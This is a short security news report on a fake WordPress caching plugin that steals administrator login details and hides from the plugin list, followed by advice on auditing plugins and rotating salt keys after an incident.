Cybersecurity researchers have identified a new tactic used by attackers to compromise WordPress sites. A fake caching plugin, named wp-runtime-cache, has been discovered hiding in the plugin directory of affected sites. While it appears to be a legitimate performance tool, it is actually designed to steal administrator login details and send them to an external server.
Security researchers at Sucuri, a web security company, found during routine malware scans found the plugin lacked author information and support links, and contained suspicious obfuscated code. The plugin data directory also only included a single PHP file, which isn’t common for legitimate, developed plugins.
Further analysis revealed that the plugin hooks into the WordPress login process via action hooks. When an administrator logs in, it captures the username and user role, then checks if the user is an administrator or editor. If so, it collects login details and posts them to a recently registered domain, woocomerce-check[.]com. The domain appeared to be part of a malicious infrastructure, with registration details indicating recent activity and discrepancy between location and contact information.
The plugin also attempts to hide itself from the list of installed plugins, making detection more difficult. These tactics demonstrate how attackers can conceal malicious activity and exfiltrate sensitive data without immediate detection.
Regular Review
This incident underscores the importance of vigilance and routine security checks. Regularly auditing installed plugins, removing unfamiliar or unused tools, and using security scanners or plugins to detect hidden or suspicious files are essential practices for WordPress site owners or administrators.
If you suspect your website has been compromised, it’s advisable to consult cybersecurity professionals promptly.
After any security incident, update your “wp-config.php” salt keys to invalidate any compromised sessions. You can use WordPress’ official online generator here or learn more about the config security keys on WordPress’ support article.
Learn more about Sucuri’s findings on their security report.
Leave a Reply